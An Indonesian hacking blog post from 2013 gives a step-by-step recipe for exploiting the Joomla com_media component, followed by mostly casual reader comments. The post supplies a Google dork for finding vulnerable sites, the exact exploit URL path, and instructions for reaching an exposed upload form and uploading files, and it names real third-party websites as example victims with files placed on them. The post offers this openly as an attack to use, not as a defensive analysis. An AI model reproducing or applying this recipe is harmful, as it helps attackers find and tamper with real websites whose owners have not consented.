• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Teknik Exploit Com_Media pada CMS Joomla

May 15, 2013 by Jack Wilder 28 Comments

Teknik Exploit Com_Media pada CMS Joomla – Kali ini saya akan share salah satu cara exploit pada CMS Joomla yaitu Exploit com_media. Teknik ini saya dapet saat baca-baca blog salah satu member ISD, yaitu SultanHaikal. Namun sayang sekarang blognya sudah dihapus. Jadi saya mencoba berbagi ulang disini.
Oke, langsung saja.
Bahan-bahan :
Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org . 
2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Maka kalian akan melihat tempat upload. Lihat SS :

4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt
5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/lol.txt, http://www.magicrete.in/images/lol.txt
6. Done.

Refrensi : http://komandanseo.blogspot.com/

Filed Under: Uncategorized Tagged With: Hacking

Reader Interactions

Comments

  1. ope says

    May 16, 2013 at 12:58 am

    Exploit com_media itu apa ya?

    Reply
    • chiaki says

      May 16, 2013 at 4:35 am

      ???

      Reply
    • Agung Skat Nevis says

      May 16, 2013 at 11:27 am

      Visit back 😀
      And izin copassss =)

      http://www.bloggerjava.net/

      Reply
  2. Wahyu Dwi says

    May 16, 2013 at 1:08 am

    rada nggak mudeng sob sama joomla 😀 hhehehe tapi pelan2 aja deh blajarnya 🙂

    Reply
    • chiaki says

      May 16, 2013 at 4:36 am

      Sip.

      Reply
  3. Bung Penho says

    May 16, 2013 at 2:08 am

    kalo bisa lebih rinci lagi nih tentang teknik ini buat apa?

    Reply
    • chiaki says

      May 16, 2013 at 4:37 am

      Ini post nya di label apa ? :p

      Reply
  4. Info Seputar Bola says

    May 16, 2013 at 3:16 am

    terimakasih sudah berbagi nih mas . rupanya bugs nya cukup mudah untuk d tembuss ..

    Reply
    • chiaki says

      May 17, 2013 at 1:19 am

      Benar sob.

      Reply
  5. Rohis Facebook says

    May 16, 2013 at 3:53 am

    nyimak aja deh gk bs komen apa2 soalx gk ngerti *smile

    Reply
    • chiaki says

      May 17, 2013 at 1:20 am

      Oke.

      Reply
  6. imam sya' roni says

    May 16, 2013 at 7:04 am

    meneruskan warisan nih kang dari sultan haikal 🙂 sipp

    Reply
    • chiaki says

      May 17, 2013 at 1:22 am

      Thanks bro.

      Reply
  7. mifta khuddin says

    May 16, 2013 at 8:25 am

    mengapa php dan html gk bisa d'upload..??

    Reply
    • chiaki says

      May 17, 2013 at 1:20 am

      Gak tau. :3

      Reply
  8. Mas Nady says

    May 16, 2013 at 9:12 am

    kunjungan sore, nyimak saja dech sobat… nggak paham, hahahaha

    Reply
  9. Muroi El-Barezy says

    May 16, 2013 at 9:17 am

    Wah joomla, kayanya nyimak dulu sob, happy blogging

    Reply
  10. aji Fauzan says

    May 16, 2013 at 10:22 am

    mantep gan (y)

    Reply
  11. Djangkaru Bumi says

    May 16, 2013 at 1:58 pm

    saya belajar joomla jadi pening sendiri.

    Reply
  12. Muhammad Rafly says

    May 16, 2013 at 2:31 pm

    Gan Tukeran Link Yuk..
    Dah Ane Pasang Link Madura Di Blog Ane Cek Yo..
    http://mrr-cyber.blogspot.com/p/link-exchange_1033.html

    Reply
    • chiaki says

      May 17, 2013 at 2:23 am

      Ntar malem ya bro. Skrg ol hp. :3

      Reply
    • Muhammad Rafly says

      May 17, 2013 at 6:36 am

      Oke Gan..

      Reply
  13. Wahyu Dwi says

    May 17, 2013 at 2:58 am

    kunjungan pagi sob 🙂

    Reply
  14. Cirebon-Cyber4rt says

    May 17, 2013 at 11:08 am

    paling suka ane kalo post gini hehehe 😀

    oh iya lama juga ngga BW dimari, apa kabar gan? 🙂

    Reply
    • chiaki says

      May 18, 2013 at 5:00 am

      Baik bro. 😀

      Reply
  15. Mas Nady says

    May 17, 2013 at 12:58 pm

    wah saya nyimak saja dech sob.. saya masih awam banget sama yang beginian hehehehe

    Reply
  16. Anonim says

    May 30, 2013 at 4:57 pm

    Blog Cacad

    Reply
    • Anonim says

      June 5, 2013 at 8:20 am

      asu

      Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

GitHub Custom Domain or Subdomain Takeover

Zendesk Custom Domain or Subdomain Takeover

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

FastMail Custom Domain or Subdomain Takeover

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Azure Traffic Manager Custom Domain or Subdomain Takeover

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

RCE pada Redis via Master-Slave Replication

WordPress Army Knife CSRF File Upload Vulnerability

LinuxSec / 16 queries in 0.14 seconds